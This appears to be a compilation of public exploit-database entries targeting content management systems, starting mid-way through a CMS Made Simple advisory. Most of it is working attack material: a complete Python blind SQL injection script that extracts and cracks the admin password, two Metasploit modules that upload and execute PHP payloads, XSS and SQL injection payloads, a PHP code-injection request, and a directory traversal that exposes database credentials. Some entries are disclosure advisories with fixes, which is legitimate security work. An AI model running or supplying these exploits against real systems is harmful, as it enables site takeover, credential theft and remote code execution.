<p class="pageinput"><input type="text" name="title" maxlength="255" value="<?php echo $title?>" /></p>
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('url')?>:</p>
<p class="pageinput"><input type="text" name="url" size="50" maxlength="255" value="<?php echo $url ?>" class="standard" /></p>
</div>
Comment:
addgroup.php: "group" parameter is written directly onto the page without validation.
addhtmlblob.php: "htmlblob" parameter is written directly onto the page without validation.
addbookmark.php: "title" and "url" parameters are written directly onto the page without validation.
Proof-of-concept:
addgroup.php: (POST) _sx_=39d304b1&group=<script>alert(2)</script>&active=on&addgroup=true
addhtmlblob.php: (POST) _sx_=39d304b1&htmlblob=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&use_wysiwyg=0&use_wysiwyg=1&content=asas&description=ddd&addhtmlblob=true&submit2=Submit
addbookmark.php: (POST) title="><script>alert(1)</script>&url="><script>alert(2)</script>&addbookmark=true
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in copy* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/copystylesheet.php(117)
File(line): cmsmadesimple/admin/copytemplate.php(160)
Code snippet:
copystylesheet.php:
$stylesheet_name = '';
if (isset($_REQUEST["stylesheet_name"])) { $stylesheet_name = $_REQUEST["stylesheet_name"]; }
...
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('stylesheet'); ?>:</p>
<p class="pageinput"><?php echo $stylesheet_name; ?></p>
</div>
copytemplate.php:
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('template'); ?>:</p>
<p class="pageinput"><?php echo $template_name; ?></p>
</div>
Comment:
copystylesheet.php: "stylesheet_name" parameter is written directly onto the page without validation.
copytemplate.php: "template_name" parameter is written directly onto the page without validation.
Proof-of-concept:
copystylesheet.php: (POST) _sx_=39d304b1&stylesheet=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&stylesheet_id=32©stylesheet=true
copytemplate.php: (POST) _sx_=39d304b1&template=%22%3E%3Cscript%3Ealert%2825%29%3C%2Fscript%3E&template_id=15©template=true&from=listtemplates.php%3F_sx_%3D39d304b1
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in list* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/addtemplate.php(117)
File(line): cmsmadesimple/admin/listtemplates.php(188)
File(line): cmsmadesimple/admin/addcss.php(65-156)
File(line): cmsmadesimple/admin/listcss.php(172)
Code snippet:
addtemplate.php:
$template = "";
if (isset($_POST["template"])) $template = $_POST["template"];
...
audit($newtemplate->id, 'HTML-template: '.$template, 'Added');
listtemplates.php:
if ($counter < $page*$limit && $counter >= ($page*$limit)-$limit) {
echo "<tr class=\"$currow\">\n"; | template name shown below
echo "<td><a href=\"edittemplate.php".$urlext."&template_id=".$onetemplate->id."\">".$onetemplate->name."</a></td>\n";
echo "<td class=\"pagepos\">".($onetemplate->default == 1?$default_true:$default_false)."</td>\n";
addcss.php:
# then its name
$css_name = "";
if (isset($_POST["css_name"])) $css_name = $_POST["css_name"];
// Now clean up name
$css_name = htmlspecialchars($css_name, ENT_QUOTES);
^ HTML encoded here, but stored in the database
...
$newstylesheet->name = $css_name;
...
$result = $newstylesheet->Save();
listcss.php:
// if user has right to delete
if ($delcss)
{
echo "<td class=\"icons_wide\"><a href=\"deletecss.php".$urlext."&css_id=".$one["css_id"]."\" onclick=\"return confirm('".cms_html_entity_decode_utf8(lang('deleteconfirm', $one['css_name']),true)."');\">"; <--- HTML decoded here
echo $themeObject->DisplayImage('icons/system/delete.gif', lang('delete'),'','','systemicon');
echo "</a></td>\n";
}
Comment:
addtemplate.php: The "template" parameter is encoded properly in addtemplate.php, but stored in the database and displayed as part of HTML output in listtemplates.php.
addcss.php: The "css_name" parameter is encoded properly in addcss.php, but stored in the database and displayed as part of HTML output in listcss.php.
Proof-of-concept:
addtemplate.php: (POST) template=%22%3E%3Cscript%3Ealert%2822%29%3C%2Fscript%3E&content=%7Bprocess_pagedata%7D%3C%21DOCTYPE+html+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+XHTML+1.0+Transitional%2F%2FEN%22+%22http%3A%2F%2Fwww.w3.org%2FTR%2Fxhtml1%2FDTD%2Fxhtml1-transitional.dtd%22%3E%0D%0A%3Chtml+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%22+xml%3Alang%3D%22en%22+%3E%0D%0A%3Chead%3E%0D%0A%3Ctitle%3E%7Bsitename%7D+-+%7Btitle%7D%3C%2Ftitle%3E%0D%0A%7Bmetadata%7D%0D%0A%7Bcms_stylesheet%7D%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A%0D%0A%3C%21--+start+header+--%3E%0D%0A%3Cdiv+id%3D%22header%22%3E%0D%0A++%3Ch1%3E%7Bsitename%7D%3C%2Fh1%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+header+--%3E%0D%0A%0D%0A%3C%21--+start+menu+--%3E%0D%0A%3Cdiv+id%3D%22menu%22%3E%0D%0A++%7Bmenu%7D%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+menu+--%3E%0D%0A%0D%0A%3C%21--+start+content+--%3E%0D%0A%3Cdiv+id%3D%22content%22%3E%0D%0A++%3Ch1%3E%7Btitle%7D%3C%2Fh1%3E%0D%0A++%7Bcontent%7D%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+content+--%3E%0D%0A%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A&active=on&addtemplate=true&submit=Submit
listcss.php: (POST) css_name="><script>alert(1)</script>&css_text=b&media_query=c&addcss=true
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in edit* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/editbookmark.php(117/121)
Important note: due to lack of time I could not test the other edit* pages, but looking at the code quickly they seem vulnerable.
I suspect the following are also vulnerable:
editcontent.php
editcss.php
editevent.php
editgroup.php
edithtmlblob.php
edittemplate.php
edituser.php
edituserplugin.php
Code snippet:
editbookmark.php:
$title = "";
if (isset($_POST["title"])) $title = $_POST["title"];
$myurl = "";
if (isset($_POST["url"])) $myurl = $_POST["url"];
...
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('title')?>:</p>
<p class="pageinput"><input type="text" name="title" maxlength="255" value="<?php echo $title?>" /></p>
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('url')?>:</p>
<p class="pageinput"><input type="text" name="url" size="80" maxlength="255" value="<?php echo $myurl ?>" /></p>
</div>
Comment:
editbookmark.php: "title" and "url" parameters are written directly onto the page without validation.
Proof-of-concept:
editbookmark.php: (POST) _sx_=39d304b1&title="><script>alert(99)</script>&url="><script>alert(999)</script>&bookmark_id=6&editbookmark=true&userid=1
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Reflected cross site scripting (XSS) in message parameter (CVE-2014-0334)
File(line): cmsmadesimple/admin/listcss.php(61)
File(line): cmsmadesimple/admin/listtemplates.php(49)
File(line): cmsmadesimple/admin/listusers.php(42)
File(line): cmsmadesimple/admin/listhtmlblobs.php(45)
File(line): cmsmadesimple/admin/listcssassoc.php(167)
File(line): cmsmadesimple/admin/templatecss.php(107)
Code snippet:
(from listcss.php)
#******************************************************************************
# first : displaying error message, if any.
#******************************************************************************
if (isset($_GET["message"])) {
$message = preg_replace('/\</','',$_GET['message']);
echo '<div class="pagemcontainer"><p class="pagemessage">'.$message.'</p></div>';
Comment:
Could not exploit the "message" param properly, as the regex strips the "<". Might be doable by someone smarter that knows how to play with encodings properly?
Proof-of-concept:
(GET) http://192.168.56.101/cmsmadesimple/admin/listcss.php?_sx_=39d304b1&message=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
======================================================================
Vulnerability: Cross Site Request Forgery
File(line): application wide
Comment:
The application contains a weak CSRF protection. The CSRF token is called "user key" and is named "_sx_", and is attributed to a user per session.
- Tokens are included in the URL in HTTP GET requests
- Tokens are also included in many Referral headers upon redirect, making them accessible to JavaScript
- Tokens are only 8 characters long (and alphanumeric only), meaning they are easy to bruteforce
- Getting a token wrong does not seem to kill the user session, making bruteforce feasible
NOTE: Version 1.11.10 doubles the character length to 16 characters which helps with bruteforce. However the application still leaks the CSRF tokens where it shouldn't, allowing them to be easily extracted in combination wit the XSS flaws.
References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
====================================================================
Vulnerability: PHP Object Insertion
File(line): cmsmadesimple/admin/changegroupperm.php(115)
Code snippet:
$selected_groups = unserialize(base64_decode($_POST['sel_groups']));
$query = 'DELETE FROM '.cms_db_prefix().'group_perms
WHERE group_id IN ('.implode(',',$selected_groups).')';
$db->Execute($query);
Comment:
User input is passed directly into unserialize().
Low risk as currently there are no exploitable methods in CMS Made Simple core. Worth keeping an eye on as they are not going to fix it anytime soon, or trail through the dozens of available plugins to see if there's an exploitable method there.
References:
https://www.owasp.org/index.php/PHP_Object_Injection
http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/
http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
http://vagosec.org/2013/12/wordpress-rce-exploit/
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
print "[+] Specify an url target"
print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
wordlist += options.wordlist
def crack_password():
global password
global output
global wordlist
global salt
dict = open(wordlist)
for line in dict.readlines():
line = line.replace("\n", "")
beautify_print_try(line)
if hashlib.md5(str(salt) + line).hexdigest() == password:
output += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print_try(value):
global output
print "\033c"
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
print "\033c"
cprint(output,'green', attrs=['bold'])
def dump_salt():
global flag
global salt
global output
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_salt)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
output += '\n[+] Salt for password found: ' + salt
def dump_password():
global flag
global password
global output
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_password)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
output += '\n[+] Password found: ' + password
def dump_username():
global flag
global db_name
global output
ord_db_name = ""
ord_db_name_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_db_name = db_name + dictionary[i]
ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_db_name)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
db_name = temp_db_name
ord_db_name = ord_db_name_temp
output += '\n[+] Username found: ' + db_name
flag = True
def dump_email():
global flag
global email
global output
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_email)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
output += '\n[+] Email found: ' + email
flag = True
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
print colored("[*] Now try to crack password")
crack_password()
beautify_print()
=============================================
Web Server Cache Poisoning in CMS Made Simple
=============================================
CVE-2016-2784
Product Description
===================
CMS Made Simple is a great tool with many plugins to publish content on the Web. It aims to
be simple to use by end users and to provide a secure and robust website.
Website: http://www.cmsmadesimple.org/
Description
===========
A remote unauthenticated attacker can insert malicious content in a CMS Made Simple
installation by poisoning the web server cache when Smarty Cache is activated by modifying
the Host HTTP Header in his request.
The vulnerability can be triggered only if the Host header is not part of the web server
routing process (e.g. if several domains are served by the same web server).
This can lead to phishing attacks because of the modification of the site's links,
defacement or Cross-Site-Scripting attacks by a lack of filtering of HTML entities in
$_SERVER variable.
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-20
**CVSS Base score**: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
----------------
Proof of Concept
----------------
Request that shows improper HTML entities filtering and will insert
' onload='javacript:alert(Xss) in the pages :
GET / HTTP/1.1
Host: ' onload='javascrscript:ipt:alert(Xss)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Request that changes the root domain for all links and allows to redirect to external
websites :
GET / HTTP/1.1
Host: www.malicious.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Solution
========
Use the variable $_SERVER['SERVER_NAME'] instead of the variable $_SERVER['HTTP_HOST']
given that the server name is correctly defined or use an application specific
constant.
Fixes
=====
Upgrade to CMS Made Simple 2.1.3 or 1.12.2.
See http://www.cmsmadesimple.org/2016/03/Announcing-CMSMS-1-12-2-kolonia and
http://www.cmsmadesimple.org/2016/04/Announcing-CMSMS-2-1-3-Black-Point for upgrade
instructions.
Mitigation : disable Smarty caching in the admin panel.
Affected Versions
=================
CMS Made Simple < 2.1.3 and < 1.12.2
Vulnerability Disclosure Timeline
=================================
02-24-2016: Vendor contacted
02-24-2016: Vulnerability confirmed by the vendor
03-01-2016: CVE identifier assigned
03-28-2016 & 04-16-2016: Vendor patch release
05-03-2016: Public Disclosure
Credits
=======
* Mickaël Walter, I-Tracing (lab -at- i-tracing -dot- com)
Website: http://www.i-tracing.com/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
'Description' => %q(
This module exploits a File Upload vulnerability that lead in a RCE in
Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated
user with "Use Showtime2" privilege could exploit the vulnerability.
The vulnerability exists in the Showtime2 module, where the class
"class.showtime2_image.php" does not ensure that a watermark file
has a standard image file extension (GIF, JPG, JPEG, or PNG).
Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,
3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Scanu', # Discovery & PoC
'Fabio Cogno' # Metasploit module
],
'References' =>
[
['CVE', '2019-9692'],
['CWE', '434'],
['EDB', '46546'],
['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],
['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Mar 11 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Base CMS Made Simple directory path", '/']),
OptString.new('USERNAME', [true, "Username to authenticate with", '']),
OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
]
)
end
def do_login
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
'vars_post' => {
'username' => datastore['username'],
'password' => datastore['password'],
'loginsubmit' => 'Submit'
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 302
@csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s
@csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s
@cookies = res.get_cookies
return
end
fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
end
def upload(fname, fcontent)
# construct POST data
data = Rex::MIME::Message.new
data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, "form-data; name=\"mact\"")
data.add_part('Upload', nil, nil, "form-data; name=\"m1_upload_submit\"")
data.add_part(@csrf_value, nil, nil, "form-data; name=\"#{@csrf_name}\"")
data.add_part(fcontent, 'text/plain', nil, "from-data; name=\"m1_input_browse\"; filename=\"#{fname}\"")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'headers' => {
'Cookie' => @cookies
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id="showoverview"/i)
return
end
print_warning('No confidence in PHP payload success or failure')
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')
)
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200
module_version = Gem::Version.new(res.body.scan(/^version = "?(\d\.\d\.\d)"?/).flatten.first)
if module_version < Gem::Version.new('3.6.3')
# Showtime2 module is uploaded and present on "Module Manager" section but it could be NOT installed.
vprint_status("Showtime2 version: #{module_version}")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
end
def exploit
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
@csrf_name = nil
@csrf_value = nil
@cookies = nil
do_login
# Upload PHP payload
fname = "#{rand_text_alphanumeric(3..9)}.php"
fcontent = "<?php #{payload.encode} ?>"
print_status('Uploading PHP payload.')
upload(fname, fcontent)
# Register uploaded PHP payload file for cleanup
register_files_for_cleanup('./' + fname)
# Retrieve and execute PHP payload
print_status("Making request for '/#{fname}' to execute payload.")
send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)
},
15
)
end
end
source: https://www.securityfocus.com/bid/54150/info
CMS Lokomedia is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
CMS Lokomedia 1.5 is vulnerable; other versions may also be affected.
http://www.example.com/lokomedia/adminweb/media.php?module=berita&halaman=<script>alert(document.cookie);</script>
http://www.example.com/lokomedia/adminweb/media.php?module=agenda&halaman=<script>alert(document.cookie);</script>
http://www.example.com/lokomedia/adminweb/media.php?module=download&halaman=<script>alert(document.cookie);</script>
http://www.example.com/lokomedia/adminweb/media.php?module=templates&halaman=<script>alert(document.cookie);</script>
http://www.example.com/lokomedia/adminweb/media.php?module=galerifoto&halaman=<script>alert(document.cookie);
http://www.example.com/Lokomedia/adminweb/media.php?module=hubungi
# # # # #
# Exploit Title: Creative Management System - CMS Lite v1.3.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://www.cmslite.co.uk/
# Software Buy: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
# Demo: http://www.cmslite.co.uk/
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?Style=[SQL]
# Etc...
# # # # #
# Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal
# Date: 2018-08-01
# Exploit Author: Thiago "thxsena" Sena
# Vendor Homepage: http://www.isweb.it
# Version: 3.5.3
# Tested on: Linux
# CVE : N/A
# PoC:
# CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download,
# as demonstrated by
moduli/downloadFile.php?file=oggetto_documenti/../.././inc/config.php
# Download and open it.
$dati_db = array(
'tipo' => 'mysql',
'host' => 'localhost',
'user' => 'networkis',
'password' => 'guybrush77',
'database' => 'networkis',
'database_offline' => '',
'persistenza' => FALSE,
'prefisso' => '',
'like' => 'LIKE'
);
source: https://www.securityfocus.com/bid/60337/info
CMS Gratis Indonesia is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
CMS Gratis Indonesia 2.2 beta 1 is vulnerable; other versions may also be affected.
POST /cmsid/?setup=yes HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/cmsid/?setup=yes
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
hostname=localhost&mysql_user=root&mysql_pass=toor&mysql_db_name=cmsid&db_prefix=iw_');phpinfo();//&step_1=Next+%C2%BB%C2%BB
source: https://www.securityfocus.com/bid/52053/info
CMS Faethon is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Faethon 1.3.4 is vulnerable; other versions may also be affected.
http://www.example.com/articles.php?by_author=[SQL]
http://www.example.com/article.php?id=[SQL]
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'CMS Bolt File Upload Vulnerability',
'Description' => %q{
Bolt CMS contains a flaw that allows an authenticated remote
attacker to execute arbitrary PHP code. This module was
tested on version 2.2.4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tim Coen', # Vulnerability Disclosure
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'References' =>
[
['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
],
'DisclosureDate' => 'Aug 17 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Bolt 2.2.4', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end
def check
cookie = bolt_login(username, password)
return Exploit::CheckCode::Detected unless cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bolt'),
'cookie' => cookie
)
if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def fname
datastore['FOLDERNAME']
end
def bolt_login(user, pass)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bolt', 'login')
)
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
session_cookie = res.get_cookies
vprint_status("#{peer} - Logging in...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bolt', 'login'),
'cookie' => session_cookie,
'vars_post' => {
'username' => user,
'password' => pass,
'action' => 'login'
}
)
return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')
nil
end
def get_token(cookie, fname)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
'cookie' => cookie
)
if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" /
return Regexp.last_match[1]
end
nil
end
def rename_payload(cookie, payload, fname)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'async', 'renamefile'),
'vars_post' => {
'namespace' => 'theme',
'parent' => fname,
'oldname' => "#{payload}.png",
'newname' => "#{payload}.php"
},
'cookie' => cookie
)
return true if res && res.code == 200 && res.body.include?('1')
nil
end
def exploit
vprint_status("#{peer} - Authenticating using #{username}:#{password}")
cookie = bolt_login(username, password)
fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
vprint_good("#{peer} - Authenticated with Bolt.")
token = get_token(cookie, fname)
fail_with(Failure::Unknown, 'No token found.') if token.nil?
vprint_good("#{peer} - Token \"#{token}\" found.")
vprint_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha_lower(10)
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
post_data = data.to_s
vprint_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
)
fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302
vprint_good("#{peer} - Uploaded the payload.")
rename = rename_payload(cookie, payload_name, fname)
fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?
php_file_name = "#{payload_name}.php"
payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)
vprint_status("#{peer} - Parsed response.")
register_files_for_cleanup(php_file_name)
vprint_status("#{peer} - Executing the payload at #{payload_url}.")
send_request_cgi(
'uri' => payload_url,
'method' => 'GET'
)
end
end
source: https://www.securityfocus.com/bid/54084/info
CMS Balitbang is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
CMS Balitbang 3.5 is vulnerable; other versions may also be affected.
http://www.example.com/balitbang/member/user.php?id=guruabsendetail&kd=<script>alert(document.cookie);</script> [XSS]
http://www.example.com/balitbang/admin/admin.php?mode=mengajar_detail&nip=<script>alert(document.cookie);</script> [XSS]
# # # # #
# Exploit Title: CMS Auditor Website 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/cms-auditor-website/
# Demo: http://74.124.215.220/~projclient/client/auditor/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
